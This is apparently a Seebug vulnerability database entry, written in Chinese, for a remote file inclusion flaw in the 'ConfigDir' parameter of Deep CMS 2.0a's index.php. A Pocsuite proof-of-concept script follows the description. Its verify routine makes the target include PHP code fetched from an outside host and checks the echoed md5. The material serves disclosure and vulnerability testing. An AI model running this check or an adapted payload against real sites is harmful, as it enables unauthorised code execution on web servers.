Deep CMS Index.PHP远程文件包含漏洞

2007-01-07T00:00:00
ID SSV:1118
Type seebug
Reporter Root
Modified 2007-01-07T00:00:00

Description

Deep CMS是一款基于PHP的内容管理程序。 Deep CMS不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'index.php'脚本对用户提交的'ConfigDir'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。

Deep CMS Deep CMS 2.0a

目前没有详细解决方案提供,请关注以下链接: <a href="http://wapcms.ru/" target="_blank">http://wapcms.ru/</a>

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '1118'  # ssvid
    version = '1.0'
    author = ['Disorder']
    vulDate = ''
    createDate = '2016-01-06'
    updateDate = '2016-01-06'
    references = ['http://www.sebug.net/vuldb/ssvid-1118']
    name = 'Deep CMS Index.PHP远程文件包含漏洞'
    appPowerLink = 'http://www.deep-cms.ru/'
    appName = 'Deep CMS'
    appVersion = 'Deep CMS 2.0a'
    vulType = 'Remote File Inclusion'
    desc = '''
    Deep CMS是一款基于PHP的内容管理程序。 Deep CMS不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'index.php'脚本对用户提交的'ConfigDir'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。
    '''
    samples = ['']

    def _attack(self):
        result = {}
        return self.parse_output(result)

    def _verify(self):
        #利用/change_preferences2.php文件验证RFI漏洞
        result = {}
        #&lt;?php echo md5('3.1416');?&gt;
        payload='http://tool.scanv.com/wsl/php_verify.txt?'
        #测试用的payload
        vulurl='{url}/index.php?ConfigDir={evil}'.format(url=self.url,evil=payload)
        #伪造的HTTP头
        httphead = {
          'Host':'www.google.com',
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #发送测试请求
        resp=req.get(vulurl,headers=httphead,timeout=50)
        #md5('3.1416')=d4d7a6b8b3ed8ed86db2ef2cd728d8ec
        match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', resp.content)
        #如果成功匹配到md5('3.1416'),证明漏洞验证成功
        if match:
            #返回测试信息
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)